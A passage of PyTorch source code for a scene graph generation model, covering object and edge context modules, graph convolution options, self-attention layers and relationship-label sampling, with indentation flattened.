output = []
pre_i = 0
for i in num_box.data.cpu().numpy():
i = int(i)
output.append(((obj_dist[pre_i:pre_i+i].max(0)[0])).clone())
pre_i = i
return torch.stack(output)
def forward(self, obj_fmaps, obj_logits, im_inds, obj_labels=None,
box_priors=None, boxes_per_cls=None, obj_feat_im_inds=None, f_map=None, union_feat=None,
rel_inds=None, rel_inds_offset=None, num_box=None, num_obj_per=None,
gt_adj_mat=None, rel_label=None, label_prior=None):
"""
Forward pass through the object and edge context
:param obj_fmaps: shape: [num_boxes, dim_feature]
:param obj_logits: shape: [num_boxes, num_classes] before softmax
:param im_inds: shape: [num_boxes, 1] each is img_ind
:param obj_labels: shape: [num_boxes, 1] each is box class
:param box_priors: shape: [num_boxes, 4] each is box position
:return:
"""
obj_logits_softmax = F.softmax(obj_logits, dim=1)
#if self.mode == 'predcls':
# obj_logits = Variable(to_onehot(obj_labels.data, self.num_classes))
# obj_logits_softmax = obj_logits
obj_embed = obj_logits_softmax @ self.obj_embed.weight
obj_embed = F.dropout(obj_embed, self.dropout_rate, training=self.training)
pos_embed = self.pos_embed(Variable(center_size(box_priors)))
obj_pre_rep = torch.cat((obj_fmaps, obj_embed, pos_embed), 1)
adj_dist_owbias_rel = None
adj_dist_owbias_obj = None
obj_ctx_gcn = None
if self.with_gcn and self.where_gcn == 'parall':
if (not self.with_gt_adj_mat) or self.type_gcn == 'gat':
adj_pre = obj_pre_rep
if self.mode == 'sgdet':
adj_obj_preds = obj_logits.detach().max(1)[1]
else:
if self.training or self.mode == 'predcls':
adj_obj_preds = obj_labels
else:
adj_obj_preds = obj_logits[:, 1:].max(1)[1] + 1
adj_dist_owbias_obj = self.from_pre_to_mat(obj_pre=adj_pre, sub_pre=adj_pre, rel_inds_graph=rel_inds,
vr_graph=union_feat,
rel_inds_offset_graph=rel_inds_offset,
obj_preds=adj_obj_preds, num=1,
)
adj_dis_softmax_obj = F.softmax(adj_dist_owbias_obj, -1)[:, 1]
if self.with_gt_adj_mat:
if self.type_gcn == 'gat':
adj_dis_softmax_obj = gt_adj_mat * adj_dis_softmax_obj
else:
adj_dis_softmax_obj = gt_adj_mat
obj_ctx_gcn \
= self.obj_gcn(obj_pre_rep,
im_inds=im_inds,
rel_inds=rel_inds,
adj_mat=adj_dis_softmax_obj
)
if self.nl_obj > 0 and self.mode != 'predcls_nongtbox':
obj_dists2, obj_preds_nozeros, obj_preds_zeros, \
obj_ctx, decoder_rep, adj_dist_owbias_obj_t = self.obj_ctx(
obj_feats = obj_pre_rep,
obj_dists = obj_logits,
im_inds = im_inds,
obj_labels = obj_labels,
box_priors = box_priors,
boxes_per_cls = boxes_per_cls,
obj_ctx_gcn=obj_ctx_gcn,
rel_inds=rel_inds,
union_feat=union_feat,
rel_inds_offset=rel_inds_offset,
label_prior=label_prior,
)
if adj_dist_owbias_obj_t is not None:
adj_dist_owbias_obj = adj_dist_owbias_obj_t
if self.ch_res:
obj_ctx = torch.cat([obj_ctx, decoder_rep],-1)
mul_dist = self.max_pooling_image(F.softmax(obj_dists2, -1), num_box)
elif self.with_gcn:
obj_dists2 = self.decoder_lin(obj_ctx_gcn)
obj_preds = obj_dists2[:, 1:].max(-1)[1] + 1
obj_preds_nozeros = obj_preds
obj_preds_zeros = obj_dists2.max(-1)[1]
else:
# UNSURE WHAT TO DO HERE
if self.mode == 'predcls' or self.mode == 'predcls_nongtbox':
obj_dists2 = Variable(to_onehot(obj_labels.data, self.num_classes))
if (self.mode == 'sgdet') and not self.training:
# NMS here for baseline
probs = F.softmax(obj_dists2, 1)
nms_mask = obj_dists2.data.clone()
nms_mask.zero_()
for c_i in range(1, obj_dists2.size(1)):
scores_ci = probs.data[:, c_i]
boxes_ci = boxes_per_cls.data[:, c_i]
keep = apply_nms(scores_ci, boxes_ci,
pre_nms_topn=scores_ci.size(0), post_nms_topn=scores_ci.size(0),
nms_thresh=0.3)
nms_mask[:, c_i][keep] = 1
obj_preds_nozeros = Variable(nms_mask * probs.data, volatile=True)[:,1:].max(1)[1] + 1
obj_preds_zeros = Variable(nms_mask * probs.data, volatile=True)[:, :].max(1)[1]
else:
obj_preds_nozeros = obj_labels if obj_labels is not None else obj_dists2[:,1:].max(1)[1] + 1
obj_preds_zeros = obj_labels if obj_labels is not None else obj_dists2[:, :].max(1)[1]
if self.mode == 'detclass':
return obj_dists2, obj_preds_nozeros, obj_preds_zeros, None, None, None, \
None, None, adj_dist_owbias_obj, None, None, None, None
adj_dis_softmax = None
if self.with_adj_mat and self.where_gcn == 'parall':
adj_pre = obj_ctx
if self.pass_embed_togcn:
pred_embed3 = self.obj_embed3(obj_preds_zeros)
pred_embed3 = F.dropout(pred_embed3, self.dropout_rate, training=self.training)
adj_pre = torch.cat((pred_embed3, adj_pre), -1)
if not self.with_gt_adj_mat:
adj_dist_owbias_rel = self.from_pre_to_mat(obj_pre=adj_pre, sub_pre=adj_pre, rel_inds_graph=rel_inds,
vr_graph=union_feat,
rel_inds_offset_graph=rel_inds_offset,
obj_preds=obj_preds_zeros, num=0,
)
if self.with_gt_adj_mat:
adj_dis_softmax_rel = gt_adj_mat
else:
adj_dis_softmax_rel = F.softmax(adj_dist_owbias_rel, -1)[:, 1]
edge_ctx = None
obj_feat_att = None
obj_feat_att_w = None
rel_inds_nms = rel_inds
rel_label_nms = rel_label
keep_union = None
rel_dists = None
if self.mode == 'sgdet':
edge_obj_pred = obj_preds_nozeros.clone()
'''
if self.training :
edge_obj_pred = obj_labels.clone()
else:
edge_obj_pred = obj_dists2.detach().max(1)[1]
'''
else:
edge_obj_pred = obj_preds_nozeros.clone()
if self.nl_edge > 0:
edge_ctx = self.edge_ctx(
torch.cat((obj_fmaps, obj_ctx), 1) if self.pass_in_obj_feats_to_edge else obj_ctx,
obj_dists=obj_dists2.detach(), # Was previously obj_logits.
im_inds=im_inds,
obj_preds=edge_obj_pred, #obj_preds_zeros, #obj_preds_zeros obj_preds_nozeros
box_priors=box_priors
)
elif self.nl_edge == 0:
edge_ctx = obj_ctx
edge_sub_ctx = None
edge_obj_ctx = None
if self.with_gcn:
#gtc_input = torch.cat([edge_ctx,f_mean_map],-1)
gtc_input = obj_ctx
if self.where_gcn == 'stack':
if self.with_adj_mat :
gtc_input = edge_ctx
adj_pre = edge_ctx
if self.mode == 'sgdet':
'''
adj_obj_preds = obj_preds_nozeros.clone()
'''
if self.training:
adj_obj_preds = obj_labels.clone()
#adj_obj_preds = obj_preds_nozeros.clone()
else:
adj_obj_preds = obj_dists2.detach().max(1)[1]
#adj_obj_preds = obj_preds_zeros
#adj_obj_preds = obj_preds_nozeros.clone()
else:
adj_obj_preds = obj_preds_nozeros.clone()
if not self.with_gt_adj_mat:
#print('obj_preds_nozeros',obj_preds_nozeros)
adj_dist_owbias_rel = self.from_pre_to_mat(obj_pre=adj_pre, sub_pre=adj_pre,
rel_inds_graph=rel_inds,
vr_graph=union_feat,
rel_inds_offset_graph=rel_inds_offset,
obj_preds=adj_obj_preds, num=0,
)
if self.with_gt_adj_mat:
adj_dis_softmax_rel = gt_adj_mat
else:
adj_dis_softmax_rel = F.softmax(adj_dist_owbias_rel, -1)[:, 1]
''' '''
if self.pass_in_obj_feats_to_gcn:
pred_embed3 = self.obj_embed3(obj_preds_nozeros)
pred_embed3 = F.dropout(pred_embed3, self.dropout_rate, training=self.training)
obj_pre_rep3 = torch.cat((obj_fmaps, pred_embed3, pos_embed), 1)
gtc_input = torch.cat((obj_pre_rep3, gtc_input), -1)
if self.pass_embed_togcn:
pred_embed3 = self.obj_embed3(obj_preds_nozeros)
pred_embed3 = F.dropout(pred_embed3, self.dropout_rate, training=self.training)
gtc_input = torch.cat((pred_embed3, gtc_input), -1)
sub_gcn_ctx, obj_gcn_ctx = self.gcn_ctx(
gtc_input,
adj_mat=adj_dis_softmax_rel,
im_inds=im_inds,
rel_inds=rel_inds,
rel_inds_offset=rel_inds_offset,
num_layer=0,
obj_preds=obj_preds_nozeros,
)
edge_sub_ctx = torch.cat([sub_gcn_ctx, edge_ctx], -1)
edge_obj_ctx = torch.cat([obj_gcn_ctx, edge_ctx], -1)
edge_ctx = sub_gcn_ctx + obj_gcn_ctx + edge_ctx
return obj_dists2, obj_preds_nozeros, obj_preds_zeros, edge_ctx, edge_sub_ctx, edge_obj_ctx, \
obj_feat_att, obj_feat_att_w, \
adj_dist_owbias_rel, adj_dist_owbias_obj, keep_union, rel_inds_nms, \
rel_dists,mul_dist
class RelModel(nn.Module):
"""
RELATIONSHIPS
"""
def __init__(self, classes, rel_classes, mode='sgdet', num_gpus=1, use_vision=True, require_overlap_det=True,
embed_dim=200, hidden_dim=256, pooling_dim=2048,
nl_obj=1, nl_edge=2, nl_adj=2, nl_mul=0, use_resnet=False, order='confidence', thresh=0.01,
use_proposals=False, pass_in_obj_feats_to_decoder=True, pass_in_obj_feats_to_gcn =False,
pass_in_obj_feats_to_edge=True, pass_embed_togcn=False,
rec_dropout=0.0, use_bias=True, use_tanh=True,
limit_vision=True,attention_dim=256, adj_embed_dim=256, with_adj_mat=False,
max_obj_num=65, bg_num_graph=-1, bg_num_rel=-1, neg_time=0,
adj_embed=False, mean_union_feat=False,
ch_res=False, with_att=False, att_dim=512,
with_gcn=False, fb_thr=0.5, with_biliner_score=False,
gcn_adj_type='hard', where_gcn = 'parall', with_gt_adj_mat=False,type_gcn='normal',
edge_ctx_type='obj', nms_union=False, cosine_dis=False, test_alpha=0.5,
ext_feat=False, *args, **kwargs
):
"""
:param classes: Object classes
:param rel_classes: Relationship classes. None if were not using rel mode
:param mode: (sgcls, predcls, or sgdet)
:param num_gpus: how many GPUS 2 use
:param use_vision: Whether to use vision in the final product
:param require_overlap_det: Whether two objects must intersect
:param embed_dim: Dimension for all embeddings
:param hidden_dim: LSTM hidden size
:param obj_dim:
"""
super(RelModel, self).__init__()
self.classes = classes
self.rel_classes = rel_classes
self.num_gpus = num_gpus
assert mode in MODES
self.mode = mode
self.pooling_size = 7
self.embed_dim = embed_dim
self.hidden_dim = hidden_dim
self.obj_dim = 2048 if use_resnet else 4096
self.pooling_dim = pooling_dim
self.use_resnet = use_resnet
self.use_bias = use_bias
self.use_vision = use_vision
self.use_tanh = use_tanh
self.limit_vision=limit_vision
self.require_overlap = require_overlap_det and self.mode == 'sgdet'
self.with_adj_mat = with_adj_mat
self.bg_num_graph = bg_num_graph
self.bg_num_rel = bg_num_rel
self.max_obj_num = max_obj_num
self.adj_embed_dim = adj_embed_dim
self.nl_adj = nl_adj
self.nl_mul = nl_mul
self.ch_res = ch_res
self.att_dim = att_dim
self.fb_thr = fb_thr
self.where_gcn = where_gcn
self.dropout_rate = rec_dropout
self.with_biliner_score = with_biliner_score
self.with_gt_adj_mat = with_gt_adj_mat
self.nl_obj = nl_obj
self.with_gcn = with_gcn
self.with_att = with_att
self.type_gcn = type_gcn
self.edge_ctx_type = edge_ctx_type
self.nms_union = nms_union
self.with_adaptive = False
self.with_cosine_dis = cosine_dis
self.test_alpha = test_alpha
self.ext_feat = ext_feat
if self.with_cosine_dis:
print('With_cosine_dis ')
self.obj_glove_vec = obj_edge_vectors(self.classes, wv_dim=self.embed_dim)
self.rel_glove_vec = obj_edge_vectors(self.rel_classes, wv_dim=self.embed_dim)
self.detector = ObjectDetector(
classes=classes,
mode=('proposals' if use_proposals else 'refinerels') if mode == 'sgdet' or mode == 'predcls_nongtbox' else 'gtbox',
thresh=thresh,
max_per_img=64,
bg_num_graph=self.bg_num_graph,
bg_num_rel=self.bg_num_rel,
with_gt_adj_mat=with_gt_adj_mat,
backbone_type=('resnet' if use_resnet else 'vgg')
)
if self.mode == 'detclass' and nl_obj == 0 and not with_gcn:
return
self.context = LinearizedContext(self.classes, self.rel_classes, mode=self.mode,
embed_dim=self.embed_dim, hidden_dim=self.hidden_dim,
pooling_dim=self.pooling_dim,
obj_dim=self.obj_dim, nl_mul=nl_mul,
nl_obj=nl_obj, nl_edge=nl_edge, nl_adj=nl_adj,
dropout_rate=rec_dropout,
order=order,
pass_in_obj_feats_to_decoder=pass_in_obj_feats_to_decoder,
pass_in_obj_feats_to_edge=pass_in_obj_feats_to_edge,
pass_in_obj_feats_to_gcn=pass_in_obj_feats_to_gcn,
pass_embed_togcn=pass_embed_togcn,
attention_dim=attention_dim, adj_embed_dim=self.adj_embed_dim,
with_adj_mat=with_adj_mat,adj_embed=adj_embed,
mean_union_feat=mean_union_feat,ch_res=ch_res,
use_bias = use_bias,
use_vision = use_vision,
use_tanh = use_tanh,
limit_vision = limit_vision,
bg_num_rel=bg_num_rel,
bg_num_graph=bg_num_graph,
with_gcn=with_gcn,
fb_thr=fb_thr,
with_biliner_score=with_biliner_score,
gcn_adj_type=gcn_adj_type,
where_gcn=where_gcn,
with_gt_adj_mat=with_gt_adj_mat,
type_gcn=type_gcn,
edge_ctx_type=edge_ctx_type,
nms_union=nms_union,
)
# Image Feats (You'll have to disable if you want to turn off the features from here)
#self.union_boxes = UnionBoxesAndFeats(pooling_size=self.pooling_size, stride=16,
# dim=1024 if use_resnet else 512)
if use_resnet:
roi_fmap = load_resnet(pretrained=False)[1]
if pooling_dim != 2048:
roi_fmap.append(nn.Linear(2048, pooling_dim))
self.roi_fmap = nn.Sequential(*roi_fmap)
self.roi_fmap_obj = load_resnet(pretrained=False)[1]
self.compress_union = None
self.compress = None
'''
roi_fmap = [Flattener(),
nn.Sequential(
nn.Linear(256 * 7 * 7, 2048),
nn.SELU(inplace=True),
nn.AlphaDropout(p=0.05),
nn.Linear(2048, 2048),
nn.SELU(inplace=True),
nn.AlphaDropout(p=0.05))]
if pooling_dim != 2048:
roi_fmap.append(nn.Linear(2048, pooling_dim))
self.roi_fmap = nn.Sequential(*roi_fmap)
self.roi_fmap_obj = nn.Sequential(
nn.Linear(256 * 7 * 7, 2048),
nn.SELU(inplace=True),
nn.AlphaDropout(p=0.05),
nn.Linear(2048, 2048),
nn.SELU(inplace=True),
nn.AlphaDropout(p=0.05))
self.compress = nn.Sequential(
nn.Conv2d(1024, 256, kernel_size=1),
nn.ReLU(inplace=True),
nn.BatchNorm2d(256),
)
self.compress_union = nn.Sequential(
nn.Conv2d(1024, 256, kernel_size=1),
nn.ReLU(inplace=True),
nn.BatchNorm2d(256),
)
'''
else:
roi_fmap = [
Flattener(),
load_vgg(use_dropout=False, use_relu=False, use_linear=pooling_dim == 4096, pretrained=False).classifier,
]
if pooling_dim != 4096:
roi_fmap.append(nn.Linear(4096, pooling_dim))
self.roi_fmap = nn.Sequential(*roi_fmap)
self.roi_fmap_obj = load_vgg(pretrained=False).classifier
self.compress_union = None
self.compress = None
self.union_boxes = UnionBoxesAndFeats(pooling_size=self.pooling_size, stride=16,
dim=1024 if use_resnet else 512, compress_union=self.compress_union)
###################################
post_lstm_in_dim = self.hidden_dim
if self.with_gcn :
post_lstm_in_dim += self.hidden_dim
#post_lstm_in_dim = self.hidden_dim
if self.mode == 'detclass':
return
self.post_obj_lstm = nn.Linear(post_lstm_in_dim, self.pooling_dim)
self.post_sub_lstm = nn.Linear(post_lstm_in_dim, self.pooling_dim)
# Initialize to sqrt(1/2n) so that the outputs all have mean 0 and variance 1.
# (Half contribution comes from LSTM, half from embedding.
# In practice the pre-lstm stuff tends to have stdev 0.1 so I multiplied this by 10.
self.post_obj_lstm.weight = torch.nn.init.xavier_normal(self.post_obj_lstm.weight, gain=1.0)
self.post_sub_lstm.weight = torch.nn.init.xavier_normal(self.post_sub_lstm.weight, gain=1.0)
'''
self.post_obj_lstm.weight.data.normal_(0, 10.0 * math.sqrt(1.0 / self.hidden_dim))
self.post_obj_lstm.bias.data.zero_()
self.post_sub_lstm.weight.data.normal_(0, 10.0 * math.sqrt(1.0 / self.hidden_dim))
self.post_sub_lstm.bias.data.zero_()
'''
if nl_edge == 0:
self.post_emb = nn.Embedding(self.num_classes, self.pooling_dim*2)
self.post_emb.weight.data.normal_(0, math.sqrt(1.0))
if self.with_adaptive:
self.adp_bilinear = nn.Linear(self.pooling_dim, 2, bias=False)
self.adp_bilinear.weight = torch.nn.init.xavier_normal(self.adp_bilinear.weight, gain=1.0)
if with_biliner_score:
self.rel_bilinear = nn.Linear(self.pooling_dim, self.num_rels, bias=False)
self.rel_bilinear.weight = torch.nn.init.xavier_normal(self.rel_bilinear.weight, gain=1.0)
else:
self.rel_compress = nn.Linear(self.pooling_dim, self.num_rels, bias=True)
self.rel_compress.weight = torch.nn.init.xavier_normal(self.rel_compress.weight, gain=1.0)
if self.use_bias and self.edge_ctx_type != 'union':
self.freq_bias = FrequencyBias(with_bg=bg_num_rel!=0)
if with_att:
self.query_conv = nn.Conv2d(in_channels=self.pooling_dim, out_channels=self.pooling_dim // 8, kernel_size=1)
self.key_conv = nn.Conv2d(in_channels=self.pooling_dim, out_channels=self.pooling_dim // 8, kernel_size=1)
self.value_conv = nn.Conv2d(in_channels=self.pooling_dim, out_channels=self.pooling_dim, kernel_size=1)
'''
self.query_conv = nn.Linear(self.pooling_dim, self.pooling_dim // 8, bias=True)
self.key_conv = nn.Linear(self.pooling_dim, self.pooling_dim // 8, bias=True)
self.value_conv = nn.Linear(self.pooling_dim, self.pooling_dim, bias=True)
'''
self.gamma = nn.Parameter(torch.zeros(1))
self.softmax = nn.Softmax(dim=-1) #
self.graph_att = None
'''
self.query_conv_1 = nn.Linear(self.pooling_dim, self.pooling_dim // 8, bias=True)
self.key_conv_1 = nn.Linear(self.pooling_dim, self.pooling_dim // 8, bias=True)
self.value_conv_1 = nn.Linear(self.pooling_dim, self.pooling_dim, bias=True)
'''
self.query_conv_1 = nn.Conv2d(in_channels=self.pooling_dim, out_channels=self.pooling_dim // 8,
kernel_size=1)
self.key_conv_1 = nn.Conv2d(in_channels=self.pooling_dim, out_channels=self.pooling_dim // 8, kernel_size=1)
self.value_conv_1 = nn.Conv2d(in_channels=self.pooling_dim, out_channels=self.pooling_dim, kernel_size=1)
self.gamma_1 = nn.Parameter(torch.zeros(1))
self.softmax_1 = nn.Softmax(dim=-1) #
self.rel_att = None
@property
def num_classes(self):
return len(self.classes)
@property
def num_rels(self):
return len(self.rel_classes)
def self_attention_layer_graph(self, x):
"""
inputs :
x : input feature maps( B X C X W X H)
returns :
out : self attention value + input feature
attention: B X N X N (N is Width*Height)
"""
m_batchsize, C, width, height = x.size()
proj_query = self.query_conv(x).view(m_batchsize, -1, width * height).permute(0, 2, 1) # B X CX(N)
proj_key = self.key_conv(x).view(m_batchsize, -1, width * height) # B X C x (*W*H)
energy = torch.bmm(proj_query, proj_key) # transpose check
attention = self.softmax(energy) # BX (N) X (N)
proj_value = self.value_conv(x).view(m_batchsize, -1, width * height) # B X C X N
out = torch.bmm(proj_value, attention.permute(0, 2, 1))
out = out.view(m_batchsize, C, width, height)
out = self.gamma * out + x
'''
proj_query_t = self.query_conv(x.permute(0, 2, 3, 1)).permute(0, 3, 1, 2).contiguous()
proj_query = proj_query_t.view(m_batchsize, -1, width * height).permute(0, 2, 1) # B X CX(N)
proj_key_t = self.key_conv(x.permute(0, 2, 3, 1)).permute(0, 3, 1, 2).contiguous()
proj_key = proj_key_t.view(m_batchsize, -1, width * height) # B X C x (*W*H)
energy = torch.bmm(proj_query, proj_key) # transpose check
attention = self.softmax(energy) # BX (N) X (N)
proj_value_t = self.value_conv(x.permute(0, 2, 3, 1)).permute(0, 3, 1, 2).contiguous()
proj_value = proj_value_t.view(m_batchsize, -1, width * height) # B X C X N
out = torch.bmm(proj_value, attention.permute(0, 2, 1))
out = out.view(m_batchsize, C, width, height)
out = self.gamma * out + x
'''
return out.mean(3).mean(2), attention
def self_attention_layer_rel(self, x):
"""
inputs :
x : input feature maps( B X C X W X H)
returns :
out : self attention value + input feature
attention: B X N X N (N is Width*Height)
"""
m_batchsize, C, width, height = x.size()
proj_query = self.query_conv_1(x).view(m_batchsize, -1, width * height).permute(0, 2, 1) # B X CX(N)
proj_key = self.key_conv_1(x).view(m_batchsize, -1, width * height) # B X C x (*W*H)
energy = torch.bmm(proj_query, proj_key) # transpose check
attention = self.softmax_1(energy) # BX (N) X (N)
proj_value = self.value_conv_1(x).view(m_batchsize, -1, width * height) # B X C X N
out = torch.bmm(proj_value, attention.permute(0, 2, 1))
out = out.view(m_batchsize, C, width, height)
out = self.gamma_1 * out + x
'''
m_batchsize, C, width, height = x.size()
proj_query_t = self.query_conv_1(x.permute(0, 2, 3, 1)).permute(0, 3, 1, 2).contiguous()
proj_query = proj_query_t.view(m_batchsize, -1, width * height).permute(0, 2, 1) # B X CX(N)
proj_key_t = self.key_conv_1(x.permute(0, 2, 3, 1)).permute(0, 3, 1, 2).contiguous()
proj_key = proj_key_t.view(m_batchsize, -1, width * height) # B X C x (*W*H)
energy = torch.bmm(proj_query, proj_key) # transpose check
attention = self.softmax_1(energy) # BX (N) X (N)
proj_value_t = self.value_conv_1(x.permute(0, 2, 3, 1)).permute(0, 3, 1, 2).contiguous()
proj_value = proj_value_t.view(m_batchsize, -1, width * height) # B X C X N
out = torch.bmm(proj_value, attention.permute(0, 2, 1))
out = out.view(m_batchsize, C, width, height)
out = self.gamma_1 * out + x
'''
return out.mean(3).mean(2), attention
def visual_rep(self, features, rois, pair_inds, type='graph'):
"""
Classify the features
:param features: [batch_size, dim, IM_SIZE/4, IM_SIZE/4]
:param rois: [num_rois, 5] array of [img_num, x0, y0, x1, y1].
:param pair_inds inds to use when predicting
:return: score_pred, a [num_rois, num_classes] array
box_pred, a [num_rois, num_classes, 4] array
"""
assert pair_inds.size(1) == 2
uboxes = self.union_boxes(features, rois, pair_inds)
#return self.roi_fmap(uboxes)
''' '''
if not self.use_resnet:
return self.roi_fmap(uboxes)
else:
#print('uboxes: ',uboxes.size())
roi_fmap_t = self.roi_fmap(uboxes)
#print('roi_fmap_t: ',roi_fmap_t.size())
if self.with_att:
if type == 'graph':
output, self.graph_att = self.self_attention_layer_graph(roi_fmap_t)
return output
if type == 'rel':
output, self.rel_att = self.self_attention_layer_rel(roi_fmap_t)
return output
else:
return roi_fmap_t.mean(3).mean(2)
def get_rel_inds(self, rel_labels, rel_labels_offset, im_inds, box_priors):
# Get the relationship candidates
if self.training:
rel_inds = rel_labels[:, :3].data.clone()
rel_inds_offset = rel_labels_offset[:, :3].data.clone()
else:
rel_cands = im_inds.data[:, None] == im_inds.data[None]
rel_cands.view(-1)[diagonal_inds(rel_cands)] = 0
# Require overlap for detection
if self.require_overlap:
rel_cands = rel_cands & (bbox_overlaps(box_priors.data,
box_priors.data) > 0)
# if there are fewer then 100 things then we might as well add some?
amt_to_add = 100 - rel_cands.long().sum()
rel_cands = rel_cands.nonzero()
if rel_cands.dim() == 0:
rel_cands = im_inds.data.new(1, 2).fill_(0)
rel_inds = torch.cat((im_inds.data[rel_cands[:, 0]][:, None], rel_cands), 1)
rel_inds_offset = rel_inds
return rel_inds, rel_inds_offset
def obj_feature_map(self, features, rois):
"""
Gets the ROI features
:param features: [batch_size, dim, IM_SIZE/4, IM_SIZE/4] (features at level p2)
:param rois: [num_rois, 5] array of [img_num, x0, y0, x1, y1].
:return: [num_rois, #dim] array
"""
'''
feature_pool = RoIAlignFunction(self.pooling_size, self.pooling_size, spatial_scale=1 / 16)(
self.compress(features) if self.use_resnet else features, rois)
return self.roi_fmap_obj(feature_pool.view(rois.size(0), -1))
'''
feature_pool = RoIAlignFunction(self.pooling_size, self.pooling_size, spatial_scale=1 / 16)(
features, rois)
if not self.use_resnet:
return self.roi_fmap_obj(feature_pool.view(rois.size(0), -1))
else:
return self.roi_fmap_obj(feature_pool).mean(3).mean(2)
def bilinear_score(self, sub, obj):
'''
Args:
obj: num_rel, dim_hid
sub: num_rel, dim_hid
Returns:
'''
prod_rep_graph = sub * obj
rel_dists_graph = self.rel_bilinear(prod_rep_graph)
return rel_dists_graph
def adp_bilinear_score(self, sub, obj):
'''
Args:
obj: num_rel, dim_hid
sub: num_rel, dim_hid
Returns:
'''
prod_rep_graph = sub * obj
rel_dists_graph = self.adp_bilinear(prod_rep_graph)
return rel_dists_graph
def forward(self, ids, x, im_sizes, image_offset,
gt_boxes=None, gt_classes=None, gt_adj_mat=None, gt_rels=None,
gt_mul_label=None, gt_mul_rel=None, gt_mul_label_num=None,
num_box=None,
proposals=None,
ae_adj_mat_rel=None,
ae_adj_mat_obj=None,
ae_pred_rel_inds=None,
train_anchor_inds=None,
return_fmap=False):
"""
Forward pass for detection
:param x: Images@[batch_size, 3, IM_SIZE, IM_SIZE]
:param im_sizes: A numpy array of (h, w, scale) for each image.
:param image_offset: Offset onto what image we're on for MGPU training (if single GPU this is 0)
:param gt_boxes:
Training parameters:
:param gt_boxes: [num_gt, 4] GT boxes over the batch.
:param gt_classes: [num_gt, 2] gt boxes where each one is (img_id, class)
:param train_anchor_inds: a [num_train, 2] array of indices for the anchors that will
be used to compute the training loss. Each (img_ind, fpn_idx)
:return: If train:
scores, boxdeltas, labels, boxes, boxtargets, rpnscores, rpnboxes, rellabels
if test:
prob dists, boxes, img inds, maxscores, classes
"""
result = self.detector(x, im_sizes, image_offset, gt_boxes, gt_classes, gt_rels, proposals,
train_anchor_inds, return_fmap=True)
if self.mode == 'detclass' and self.nl_obj == 0 and not self.with_gcn:
if self.training:
return result
else:
rm_obj_softmax = F.softmax(result.rm_obj_dists, dim=-1)
obj_preds = rm_obj_softmax[:, 1:].max(-1)[1] + 1
twod_inds = arange(obj_preds.data) * self.num_classes + obj_preds.data
obj_scores = F.softmax(result.rm_obj_dists, dim=-1)
obj_preds = obj_preds.cpu().data.numpy()
rm_box_priors = result.rm_box_priors.cpu().data.numpy()
return rm_box_priors, obj_preds, obj_scores
if result.is_none():
return ValueError("heck")
im_inds = result.im_inds - image_offset
obj_feat_im_inds = im_inds
boxes = result.rm_box_priors
if self.mode == 'sgdet':
max_num_bg = int(max(self.bg_num_graph, self.bg_num_rel))
if self.bg_num_graph == -1 or self.bg_num_rel == -1:
max_num_bg = -1
rel_labels_fg, result.gt_adj_mat_graph, rel_labels_offset_fg \
= rel_assignments(im_inds.data, boxes.data, result.rm_obj_labels.data,
gt_boxes.data, gt_classes.data, gt_rels.data,
image_offset, filter_non_overlap=True,
num_sample_per_gt=1, max_obj_num=self.max_obj_num,
time_bg=0, time_fg=1)
rel_labels_bg, result.gt_adj_mat_rel, rel_labels_offset_bg \
= rel_assignments(im_inds.data, boxes.data, result.rm_obj_labels.data,
gt_boxes.data, gt_classes.data, gt_rels.data,
image_offset, filter_non_overlap=True,
num_sample_per_gt=1, max_obj_num=self.max_obj_num,
time_bg=max_num_bg, time_fg=0)
max_num_bg = (rel_labels_bg.shape[0] / (1.0 * rel_labels_fg.shape[0]))
num_bg_graph = int((self.bg_num_graph / (1.0 * max_num_bg)) * rel_labels_bg.shape[0])
num_bg_rel = int((self.bg_num_rel / (1.0 * max_num_bg)) * rel_labels_bg.shape[0])
if self.bg_num_graph == -1:
num_bg_graph = rel_labels_bg.shape[0]
if self.bg_num_rel == -1:
num_bg_rel = rel_labels_bg.shape[0]
if num_bg_graph > 0:
if num_bg_graph < rel_labels_bg.size(0):
rel_labels_bg_ind_graph = random_choose(rel_labels_bg, num_bg_graph, re_id=True)
rel_labels_graph_bg_ch = rel_labels_bg[rel_labels_bg_ind_graph].contiguous()
rel_labels_graph_offset_bg_ch = rel_labels_offset_bg[rel_labels_bg_ind_graph].contiguous()
else:
rel_labels_graph_bg_ch = rel_labels_bg
rel_labels_graph_offset_bg_ch = rel_labels_offset_bg
rel_labels_graph = torch.cat([rel_labels_fg, rel_labels_graph_bg_ch], 0)
rel_labels_offset_graph = torch.cat([rel_labels_offset_fg, rel_labels_graph_offset_bg_ch], 0)
else:
rel_labels_graph = rel_labels_fg
rel_labels_offset_graph = rel_labels_offset_fg
if num_bg_rel > 0:
if num_bg_rel < rel_labels_bg.size(0):
rel_labels_bg_ind_rel = random_choose(rel_labels_bg, num_bg_rel, re_id=True)
rel_labels_rel_bg_ch = rel_labels_bg[rel_labels_bg_ind_rel].contiguous()
rel_labels_rel_offset_bg_ch = rel_labels_offset_bg[rel_labels_bg_ind_rel].contiguous()
else:
rel_labels_rel_bg_ch = rel_labels_bg
rel_labels_rel_offset_bg_ch = rel_labels_offset_bg
rel_labels_rel = torch.cat([rel_labels_fg, rel_labels_rel_bg_ch], 0)
rel_labels_offset_rel = torch.cat([rel_labels_offset_fg, rel_labels_rel_offset_bg_ch], 0)
else:
rel_labels_rel = rel_labels_fg
rel_labels_offset_rel = rel_labels_offset_fg
result.rel_labels_rel = rel_labels_rel
result.rel_labels_offset_rel = rel_labels_offset_rel
result.rel_labels_graph = rel_labels_graph
result.rel_labels_offset_graph = rel_labels_offset_graph
_, perm_rel = torch.sort(result.rel_labels_rel[:, 0] * (boxes.size(0) ** 2)
+ result.rel_labels_rel[:, 1] * boxes.size(0)
+ result.rel_labels_rel[:, 2])
result.rel_labels_rel = result.rel_labels_rel[perm_rel]
result.rel_labels_offset_rel = result.rel_labels_offset_rel[perm_rel]
_, perm_graph = torch.sort(result.rel_labels_graph[:, 0] * (boxes.size(0) ** 2)
+ result.rel_labels_graph[:, 1] * boxes.size(0)
+ result.rel_labels_graph[:, 2])
result.rel_labels_graph = result.rel_labels_graph[perm_graph]
result.rel_labels_offset_graph = result.rel_labels_offset_graph[perm_graph]
num_true_rel = rel_labels_fg.shape[0]
_, num_true_rel_ind = torch.sort(perm_rel)
num_true_rel_ind = num_true_rel_ind[:num_true_rel]
result.num_true_rel = num_true_rel_ind
else :
result.gt_adj_mat_graph = gt_adj_mat
#print('result.rel_labels_graph',result.rel_labels_graph)
#print('result.rel_labels_offset_graph', result.rel_labels_offset_graph)
#print('result.rel_labels_rel', result.rel_labels_rel)
#print('result.rel_labels_offset_rel', result.rel_labels_offset_rel)
